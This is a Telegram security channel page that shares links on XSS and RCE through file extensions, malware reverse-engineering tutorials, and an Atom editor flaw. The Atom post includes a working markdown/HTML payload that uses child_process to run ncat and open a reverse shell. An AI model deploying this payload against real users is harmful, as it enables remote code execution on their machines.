HackerOne – Telegram
HackerOne
11K subscribers
644 photos
31 videos
79 files
2.74K links
Community : @Sec0x01
@Bug0x
Download Telegram
🔗 imba.io


Imba is a new programming language for the web that compiles to highly performant and readable JavaScript. It has language level support for defining, extending, subclassing, instantiating and rendering dom nodes. For a simple application like TodoMVC, it is more than 10 times faster than React with less code, and a much smaller library.
*XSS via different extensions
*SSI in IIS
*RCE in IIS

https://mike-n1.github.io/ExtensionsOverview
HackerOne
From Markdown to RCE in Atom https://statuscode.ch/2017/11/from-markdown-to-rce-in-atom/
XSS -> RCE in Atom,

Get a shell when rendering the markdown


demo.md:

<iframe src="/home/user/demo.html">

demo.html:

<noscript> window.top.require('child_process').execFile('/usr/bin/xterm',['-e', 'ncat 127.0.0.1 4242 -e /bin/bash']); </noscript>
#tutorial
Reverse Engineering Malware 101 by Amanda Rousseau

https://securedorg.github.io/RE101/
#tutorial
Reverse Engineering Malware 102 by Amanda Rousseau



https://securedorg.github.io/RE102/